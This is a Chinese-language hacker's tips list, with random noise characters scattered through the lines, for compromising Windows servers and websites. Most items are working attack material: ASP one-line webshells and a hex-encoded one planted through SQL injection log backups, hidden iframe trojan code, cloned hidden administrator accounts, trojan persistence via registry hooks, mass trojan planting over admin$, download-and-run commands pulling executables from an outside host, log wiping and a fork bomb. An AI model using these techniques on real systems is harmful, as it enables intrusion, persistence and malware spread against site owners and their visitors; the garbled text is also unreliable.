1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: V7 j/ F; |- Z: i) Gcacls C:\windows\system32 /G hqw20:R5 j8 j' O9 i. ?; P, n; F
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入, K* U# N/ A* s% p6 m
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
' h+ R' ?" J" _9 f0 F7 Y H w) o$ x0 H; d# i4 d, f" j2 j5 }
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
/ S o3 }* k; k$ b4 r" x8 o6 M$ H8 S; Y7 s
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。3 d9 t8 W- H/ n; W) V) s" ?; a
x9 Y$ O4 j2 p* T) W6 a; a
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
$ }) m z4 [% u5 q$ Z( ]7 `/ z, g9 }& a
5、利用INF文件来修改注册表
c8 R B4 k' z4 G% l. L[Version]8 N& p. P- s. q' v6 N+ x
Signature="$CHICAGO$"
{; L4 ]9 [" ?% A[Defaultinstall]
9 v0 h' C4 ^; _* h# QaddREG=Ating
7 ]" u# T! E5 Z5 _ G! E: J[Ating]7 J f8 | ?( V6 u1 b, S
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
f* R' C. _' ^7 e0 A以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:5 v( O5 c3 }# w; ]! f$ \
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径* w! Z- A. ^# r/ G, t5 z0 J1 A/ }# g7 p
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
- V4 n2 i" U9 N/ HHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU# a Z0 j1 |2 |% M. l( i7 H
HKEY_CURRENT_CONFIG 简写为 HKCC0 d5 K" C- |4 V+ ~0 v4 r
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
/ g' y: O6 K0 f- C"1"这里代表是写入或删除注册表键值中的具体数据* a+ k0 x4 | b/ ^9 @3 c
* X' n, L+ t) `# W. I: {6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
+ Q3 [% f1 R* x. V) l多了一步就是在防火墙里添加个端口,然后导出其键值3 @- C7 J& p! l
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
9 l+ A2 B3 ~8 M. d6 X
7 D% G2 h# O5 a0 F7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽" D* Y" x! r8 K: v7 m, `, v' t
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
) t7 J7 `& t; C
( ?- U1 Q7 q8 r, Y8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
8 X1 R# U: H7 l8 | g! P1 l
3 A- n5 {$ B" f) A3 N0 u, {: [9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,' l. T/ I; G1 W; L6 q8 n- w$ M
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
7 n4 O7 v/ d7 }. ]* j! d, k1 R, L; W. j: S, U! H$ b% W& w
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
4 M: n' n- E0 A$ u) G
# K! C. i- ]+ g: ~11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
- B, w3 Z+ n3 n# j# P用法:xsniff –pass –hide –log pass.txt% P9 x9 ~. A# k/ R8 K0 k9 k
% c1 x8 E T$ u12、google搜索的艺术
9 |1 E% j* L. z @! ?搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
+ o1 D0 M6 x" ^ O3 B或“字符串的语法错误”可以找到很多sql注入漏洞。9 i, p$ @. I& ^) X$ b+ B
/ \. ^- T9 I' a( k' _. c13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。: n; S4 v+ M. L6 x1 P" n
+ u: ^3 G+ e; t% j' t14、cmd中输入 nc –vv –l –p 1987
/ i) {( N ?# g) c$ n做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
2 L* ^' H2 l' J
4 O! Z N* o5 s15、制作T++木马,先写个ating.hta文件,内容为, ~; y' O- z9 h( }9 p
<script language="VBScript">& j8 Q! I! _& J3 [
set wshshell=createobject ("wscript.shell" )+ ? Y- t& Q& V, x0 x! a9 K
a=wshshell.run("你马的名称",1)6 }3 D2 r6 E9 \( w! @# B, C
window.close) S W+ M' N+ h
</script>' x+ d% j2 d; T7 R1 @2 H
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。+ U! s$ b; L7 D4 v9 d. J- ~, c
$ G" r4 F6 H8 p4 D8 f5 B
16、搜索栏里输入
% k4 }. T9 K: J A. C4 M关键字%'and 1=1 and '%'='7 z* f* N6 ]" d& ]4 j
关键字%'and 1=2 and '%'=' a, b; S7 _7 B7 X4 ^
比较不同处 可以作为注入的特征字符
: |4 r2 V7 s* F, |
: O" c: f: X. g* e* m17、挂马代码<html>
5 c8 q L v% ]<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>9 M* f8 k; w- q$ A; l
</html>
7 p2 G3 D" @5 d: ^0 N
0 i: Q9 N& ?) o* h' n3 L18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,/ O+ N# }6 v! n, d E
net localgroup administrators还是可以看出Guest是管理员来。7 Y- z* g2 S5 e& S5 G" ?
7 G$ O: j5 |. J19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
) F* d2 A' G1 U8 N! F- F用法: 安装: instsrv.exe 服务名称 路径( N# U% M8 s8 a- M! H. B" Q/ p; ?
卸载: instsrv.exe 服务名称 REMOVE
/ E B7 m! r6 g' K3 u+ }
, Q2 Y m9 f/ ^) @' c1 E2 ?6 m5 O
! K+ A3 |9 ]) f! T0 G3 i. o21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉' W! Y6 ~& |: Z: e' S5 s% Q
不能注入时要第一时间想到%5c暴库。
/ F8 T) W+ O0 e0 y3 k6 G+ X7 X, u+ d8 |
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
1 l; M, [- u, T' f6 @( |; U
' I3 u6 j" g0 _9 y& x23、缺少xp_cmdshell时
; D, j! [, w! m尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'2 S1 F! K- o7 n8 K# A% h" t
假如恢复不成功,可以尝试直接加用户(针对开3389的)- L8 [0 z/ O. R
declare @o int
+ {; o, r' R1 D; Z( _8 z% Oexec sp_oacreate 'wscript.shell',@o out V. R3 ^& u3 }. F. p# n
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
& |" M% `; U: ~* o; h( g
; E9 L. F4 q7 e4 i4 P5 x+ e6 {% D24.批量种植木马.bat ?3 E9 i" o& s7 \
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中 k b7 @8 V3 [( Y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
, k5 @1 n) {! _; y6 `扫描地址.txt里每个主机名一行 用\\开头9 |8 B4 {2 S' Q6 {
/ g/ g; ?( l$ [! ]25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
+ c6 J4 C4 V% I: {' t- Q. i2 s: ]) l7 v3 e' F
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
/ P9 |$ X7 k7 F- A将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
: r0 E1 e" t# W# X.cer 等后缀的文件夹下都可以运行任何后缀的asp木马$ M/ o3 }2 b8 K$ P
I$ J) N( G0 z3 ?. R6 N' _27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
v3 v/ W0 f+ I n) f; S4 u* [然后用#clear logg和#clear line vty *删除日志
t9 p* D. Y: g& a! n5 t
2 H5 K' e( N5 I/ S28、电脑坏了省去重新安装系统的方法
- @ {, H! a) p1 U# b, A8 h纯dos下执行,$ S" h' c8 h' q$ h
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config; w9 f5 I4 l9 _8 z, Z5 w1 l
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config& L% N# @5 ?- `! w) J# z8 L
$ l6 H4 x1 W5 D3 R& i% h
29、解决TCP/IP筛选 在注册表里有三处,分别是:$ V- n( S" L4 b+ {6 Z
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
& X) h# q; O, \2 mHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip/ V- N2 y0 M/ d: z$ o' d
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& h( d( U: y5 J分别用
6 _+ s h" e* G0 ^regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip* E p8 h4 [) s6 ^; R
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
/ q6 x; b7 L6 ~/ Z4 k; sregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ o. g) O+ v3 u7 x7 f" _# b
命令来导出注册表项
& G6 F6 u7 T) {/ ?' \* p# }+ X然后把三个文件里的EnableSecurityFilters"=dword:00000001,5 h: i" }; f" _& B1 ?$ i# B
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用/ ^# E5 |' C! ?* t: X1 s/ G# r
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
. G, v/ X- ~7 y/ G2 `8 b, c. V9 I' H7 C
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
* c7 \2 H% R( ?( ~5 r& zSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
* h1 @% v/ {% P6 x
& Z7 V) ]8 F: E4 W p9 v# J31、全手工打造开3389工具
0 O5 d* s/ T* O! Y* J- k' R+ n5 p% k打开记事本,编辑内容如下:
( N! C4 U e: Uecho [Components] > c:\sql. ?0 K3 k. Z$ T3 \- e6 _- M2 n
echo TSEnable = on >> c:\sql
3 b) a* W: o: ]5 f3 Csysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q2 K4 I8 P/ W! p2 v& o; I& w
编辑好后存为BAT文件,上传至肉鸡,执行
; m! W+ M* ~9 G$ \3 S
; H- _- T$ c4 d0 i( s+ ?" k32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
% Z' K, i9 u: o, a0 B
3 v$ U/ ]* _0 v+ t7 k4 t2 M: U33、让服务器重启, G C0 w% Q! p, t5 i9 E# G! C
写个bat死循环:; N: J: j5 e7 T1 {& V5 L# d
@echo off
2 K1 e' `/ q6 m. F8 r" ?:loop1
% ~; g# H# T6 F2 gcls
, p, W1 ?5 I( X0 @# \" }start cmd.exe2 ~4 J# N% v# G7 g$ s2 C
goto loop16 r8 s& D8 R% n) w
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启# m9 n0 J, N3 T7 W' h% F) f
% g3 r% Q; a# ^: O
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
* |8 u Z- q+ H0 X@echo off) a# P4 v9 U, r: S" ?
date /t >c:/3389.txt
# L$ d, T9 p) E" h) H2 stime /t >>c:/3389.txt+ A: {/ T' C6 m' z9 x
attrib +s +h c:/3389.bat
$ A: U3 ^# k% y. `4 c+ yattrib +s +h c:/3389.txt+ m+ F% ?/ p U' z- l9 i" |
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt! D, \4 I3 }* d) F' x+ x
并保存为3389.bat
% D" d4 ?8 T# C- s' q# a打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
5 \, Q7 ~# e, b& D! t; Q% H% u! Z6 p# m& K @; N$ y; U" C* {0 q# v* S% L
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
8 d4 @' k( D$ P, g& _. Ustart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
% O, Q8 `1 z2 }6 Y" D输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。, F i/ N8 d2 B& y3 y
8 T' v$ [# f! H: e
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
4 ?# m* v6 Z' ?+ \echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
2 e! |& U# z" I" P2 X: P( S% Fecho 你的FTP账号 >>c:\1.bat //输入账号
- M# V8 y* d& E; R& }echo 你的FTP密码 >>c:\1.bat //输入密码% y0 b6 i+ }6 p. J' n
echo bin >>c:\1.bat //登入+ h. L% [- S5 A& h# P9 {/ D" B
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么# P G, X2 \0 q4 `2 K! e
echo bye >>c:\1.bat //退出
& V2 g- `( s; r7 ~# v0 b& i1 _然后执行ftp -s:c:\1.bat即可
0 X! V& e g3 Q1 n- D% @, Z! l W* ?8 I1 f. M k, k u
37、修改注册表开3389两法
: V4 R4 A, u/ v w; }(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
. I1 m" z5 G/ O# techo Windows Registry Editor Version 5.00 >>3389.reg
/ d7 h. |. y; q, u( X, c0 }( ~% N# `echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
n) {, N, O& V9 yecho "Enabled"="0" >>3389.reg
' J' l' b: S1 ^8 fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows( T* r1 l& _3 i
NT\CurrentVersion\Winlogon] >>3389.reg/ M" O% [+ s: Q1 F5 a; V9 z
echo "ShutdownWithoutLogon"="0" >>3389.reg
; e* b" q* y/ k# o' Q$ Eecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]+ y( N2 a" O" I4 G( m7 E
>>3389.reg& u/ E. P2 h& ^! D& z: I
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
. h# n9 P6 f, x' Vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]! @! [1 M4 H( n n9 l3 l
>>3389.reg
$ f; [' K( C( r5 P) uecho "TSEnabled"=dword:00000001 >>3389.reg
! \! E4 W6 Y, ^6 wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg. p3 \5 y6 _; R, p1 M4 h. j
echo "Start"=dword:00000002 >>3389.reg+ n* D* x! v" F. H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
1 Q% }7 `1 x! g# d% C2 y& x>>3389.reg, A1 J, @5 b& F% }
echo "Start"=dword:00000002 >>3389.reg
+ W4 a9 d" \* f; Z9 F. Mecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
$ x |7 s# c, U& Necho "Hotkey"="1" >>3389.reg* h5 e- l# D7 ?
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: `- ?! M! J W
Server\Wds\rdpwd\Tds\tcp] >>3389.reg) P4 C/ p( J; F
echo "PortNumber"=dword:00000D3D >>3389.reg
8 z; n% l9 j- x: @" Q2 r9 Mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# a9 U* ]7 O1 \; I; iServer\WinStations\RDP-Tcp] >>3389.reg4 L J j, _* R4 |7 x8 Y2 b
echo "PortNumber"=dword:00000D3D >>3389.reg- `) \, h' O! j/ [" M% e
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。! l; J( h0 {$ j5 Z/ m. t
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
0 d0 u. x. m, i1 S2 y+ z因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效8 J+ l) X( v: J9 x1 j. A- V
(2)winxp和win2003终端开启
' n! a6 g+ L/ E6 Y: N h. y0 a" Z用以下ECHO代码写一个REG文件:- L% c% F1 H" D6 ^1 x( r
echo Windows Registry Editor Version 5.00>>3389.reg: @" p. \0 G( o/ ]9 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 C# y0 c& O s) E" ~ }
Server]>>3389.reg
I6 \* d3 x/ \6 [6 L# s: E Decho "fDenyTSConnections"=dword:00000000>>3389.reg0 s% {% H; Z `9 c4 L0 ^& f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* v! z1 @& B# h$ K+ E. O3 o- x
Server\Wds\rdpwd\Tds\tcp]>>3389.reg4 L" H, }6 P2 _3 E$ n
echo "PortNumber"=dword:00000d3d>>3389.reg
/ R6 R$ b- Y1 ^. O$ {' Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# i! N2 u% C8 y9 Y
Server\WinStations\RDP-Tcp]>>3389.reg
1 N: c. J' V/ d) [) Wecho "PortNumber"=dword:00000d3d>>3389.reg
* O/ v/ X) p% l8 H7 V% ^9 x然后regedit /s 3389.reg del 3389.reg
k5 t$ W1 ]1 `. qXP下不论开终端还是改终端端口都不需重启6 w/ Y8 ?% E" I$ e
- {' Y7 K$ {4 J# h6 D1 n( n+ H
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
+ U. g3 y* M) g3 z" \% ?, G# l用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
7 T6 j; ?+ b! t6 u
: H4 V4 B1 f& H/ o$ {' _" z39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
* p+ G7 N( E# K5 m- d(1)数据库文件名应复杂并要有特殊字符
% O4 w* B3 x% ^/ f, U! {(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
+ t# I- {( J, v* T9 {; u% E将conn.asp文档中的
3 S7 K2 C: m! {2 _& W( CDBPath = Server.MapPath("数据库.mdb")
) Z* u3 q* l( |: w1 A7 h& L$ }conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath5 ]# J! m, k4 g: i/ a. q ^
" F/ v' ]+ M2 @: k
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置: R0 c8 F) n2 Z/ Z0 e4 J
(3)不放在WEB目录里; e1 F9 R% ~' q9 Y) Q
# ^. O9 |$ y0 p40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉2 a4 B; M: ?* F T g6 g* Y f4 _6 A3 m
可以写两个bat文件
! a8 }: W; K9 k3 L& o@echo off% G9 F- w& t- t9 f
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe! q) |/ k( e* h: F% c5 L* G, W
@del c:\winnt\system32\query.exe
. M7 ~ t" V/ w0 K- Q, }@del %SYSTEMROOT%\system32\dllcache\query.exe
4 l$ U/ [ d, [8 d" K( ~9 ?@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的, G1 K& h8 o: X
S5 n6 A" z& w. A; ?! q; ^; o
@echo off
9 ~8 M3 K W P5 |@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe4 h+ m& o7 ^# g. [8 [! W1 u% o" X/ T& Q. A
@del c:\winnt\system32\tsadmin.exe
0 H& Y4 R) V: v: j@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
( h4 j) W" Q0 W$ p7 r) x4 F, e) L
" t# B h4 \' D- y% u! B9 y4 F41、映射对方盘符; s: Z- @8 B4 w
telnet到他的机器上,
3 k8 y0 i& e* Rnet share 查看有没有默认共享 如果没有,那么就接着运行3 k/ m0 s; m$ H i: I1 b
net share c$=c:
/ J" {- c" h {6 Z. Gnet share现在有c$
+ w3 V+ k b7 k$ a, w8 P在自己的机器上运行5 _$ u) {- g, F. t; T
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
3 [1 Y1 ?0 i' y+ D5 n; A; C5 i1 f1 K5 x
42、一些很有用的老知识3 I. n, R9 x$ b( g* N
type c:\boot.ini ( 查看系统版本 )
+ k6 M4 F# q$ k- S' Enet start (查看已经启动的服务)
# {& R4 d0 A7 ]+ |8 f" g. Pquery user ( 查看当前终端连接 )% K8 T* Q3 `8 G4 f
net user ( 查看当前用户 )
7 Q' R7 v$ d& N% G/ j4 xnet user 用户 密码/add ( 建立账号 )" f: A) E2 `9 b; }5 p% s. H
net localgroup administrators 用户 /add (提升某用户为管理员)
2 h: x0 A/ d% n3 j& e# aipconfig -all ( 查看IP什么的 )
/ f* i$ O9 v6 |% Onetstat -an ( 查看当前网络状态 )1 Z4 s" H& E6 r6 V3 Z
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
, i0 N' a4 g/ Q+ ?! ?- X5 P克隆时Administrator对应1F4
# {+ M1 ?2 \3 A( W* G2 x# D+ b0 `guest对应1F5
" l& I/ \5 }* p7 ~tsinternetuser对应3E8
, N" ]4 `/ W7 m- o- m6 ] d+ `7 l' C1 E h& d
43、如果对方没开3389,但是装了Remote Administrator Service
+ W1 i' I* K5 k+ I# z, x用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
9 h5 [/ I1 g- f- P6 s% _/ A H& a解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
" q8 |" F* y- {" q/ q, y5 `先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"4 o9 Q( a. B9 Q
$ O9 w" X6 i, @; ^6 }44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)# p4 u+ n2 g4 H( s/ o8 C- b
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
& X5 \/ h1 ~2 j; B$ V' e* S
7 W! G4 S, E' R. h45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
& {6 C2 @# ~6 j9 T( v i2 ?0 F, decho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
2 b1 P" P. ]+ b1 k9 \( _^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
7 b, }( C8 A/ [/ e9 h5 KCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
/ j8 W6 }0 M4 E1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
7 y5 p; n4 u- b3 B5 w- ~% T(这是完整的一句话,其中没有换行符)
y( Z$ ~; `+ j) M9 }0 i2 |) g$ r# y然后下载:* A% N( \5 ?8 x% I$ M
cscript down.vbs http://www.hack520.org/hack.exe hack.exe* \% v4 J4 I, Y+ Y# z; g& M
5 a# Z! c% n0 K$ e' ^) y0 K: I46、一句话木马成功依赖于两个条件:: J+ E( V& l6 f& u7 C1 r, k
1、服务端没有禁止adodb.Stream或FSO组件
" a% E, \: S6 H& m2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
2 `% e, o0 ?- C& m8 q
4 w/ g: j0 s* Q! t. {& ~! T5 V47、利用DB_OWNER权限进行手工备份一句话木马的代码:$ P- k2 w8 N; n; I8 b Z% z3 z
;alter database utsz set RECOVERY FULL--
+ X. h% X5 l) g9 o9 i! M) Y. C;create table cmd (a image)--6 Y+ b- d+ }3 F, }, t) T5 S; X
;backup log utsz to disk = 'D:\cmd' with init--
_ I! b7 g" Z6 ^) X3 L5 M z;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- h: z8 L: |+ ^" P, a
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--; H8 ?# Y8 O0 F& F- G
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。4 M3 U; l$ q( M6 {
2 C' o( g& {" G5 f48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) V3 V" |- e' v) c3 W& {) W' Y" z. l, c
8 g2 n! G/ B& E用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
6 H8 y' t2 f* G" @) j所有会话用 'all'。- T" o G; }8 h' C
-s sessionid 列出会话的信息。1 Z1 g- @$ m4 L- q) h& b. _# S1 k
-k sessionid 终止会话。, l! S+ i: o j- [; w( G
-m sessionid 发送消息到会话。( ~3 O8 t& W! w I
) M$ r3 v4 b$ f# h4 Uconfig 配置 telnet 服务器参数。 b$ o n! o$ B
3 e& H1 f8 ?8 | g3 b) W
common_options 为:
6 Y u4 Y7 X& S! y6 P r( W7 U. i# Y' W-u user 指定要使用其凭据的用户4 { \8 r' X: }1 i1 U" s
-p password 用户密码% n6 V3 D: g+ K6 w7 { y8 n5 [ `
- L' t) g( e: v: G9 I/ P
config_options 为:
. j2 E. e3 P# p( ~" c$ Hdom = domain 设定用户的默认域
[6 z- @- ^* v+ e0 nctrlakeymap = yes|no 设定 ALT 键的映射
) S% A, s$ \6 U8 btimeout = hh:mm:ss 设定空闲会话超时值
% V8 L8 d; p" Ntimeoutactive = yes|no 启用空闲会话。 x+ k/ ]5 d& z
maxfail = attempts 设定断开前失败的登录企图数。; |, T) C+ o) }3 p" a% U. b1 {+ @" N
maxconn = connections 设定最大连接数。- V2 P6 D& [# [5 \4 e. K1 |
port = number 设定 telnet 端口。
q q( D# E$ p" ^5 |9 g5 w1 Hsec = [+/-]NTLM [+/-]passwd
* P9 ]7 J0 L/ i: E# [设定身份验证机构2 P, ]& ?. A: O, F5 g& z
fname = file 指定审计文件名。
O5 U/ b6 A; r4 f0 T+ mfsize = size 指定审计文件的最大尺寸(MB)。; W0 U: Z9 ]8 V* b2 l9 X9 @1 e
mode = console|stream 指定操作模式。 ?! O5 {5 `, U5 a" X
auditlocation = eventlog|file|both
/ r5 P' U' y+ j s! f0 w指定记录地点
( B6 ~; ~/ v* Oaudit = [+/-]user [+/-]fail [+/-]admin! f# K! {: o" }) ^9 j6 q, i, D
8 t( Y3 r( C1 H# s49、例如:在IE上访问:
7 G @% \3 S; u. x! C0 E0 Lwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 o z8 d7 [. ^: y! Chack.txt里面的代码是:+ d2 o3 i3 b4 c
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
1 z9 j8 f0 g2 }2 U2 w- n8 g把这个hack.txt发到你空间就可以了!( q% r; Z% Y' b9 O5 \ k
这个可以利用来做网马哦!$ _9 a7 s) n. P J% ~
. ?' r$ M8 A: s- q0 ]) c/ p50、autorun的病毒可以通过手动限制!
) M) Y. D0 q8 R2 z6 X* ]0 i$ A1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!7 _6 _9 i& U. x2 q* Y6 q2 I
2,打开盘符用右键打开!切忌双击盘符~: M6 I0 N/ ~, e) S. O; u1 w
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
) C3 W1 _+ N- ^# o1 }
, U: `) P. V- }' Z" a4 X51、log备份时的一句话木马:. t3 [( N2 Z7 g( i; z* |' r
a).<%%25Execute(request("go"))%%25>
9 i1 L( l3 E5 T. G6 H( zb).<%Execute(request("go"))%>% d" a1 f( ^0 v; _% T! T; q! q. C
c).%><%execute request("go")%><%) {( b @1 q; k0 [0 ^; D g: J
d).<script language=VBScript runat=server>execute request("sb")</Script>
3 q$ K f3 ~5 ^; ]" S9 K) oe).<%25Execute(request("l"))%25>8 Z4 X5 G/ g8 z) N
f).<%if request("cmd")<>"" then execute request("pass")%>! r4 f4 ^3 I6 B5 J+ b3 P/ o
, p) H( C& n2 M3 {: [- n4 w
52、at "12:17" /interactive cmd
4 E% ^" S6 s7 |0 I' k1 h% ?% W执行后可以用AT命令查看新加的任务
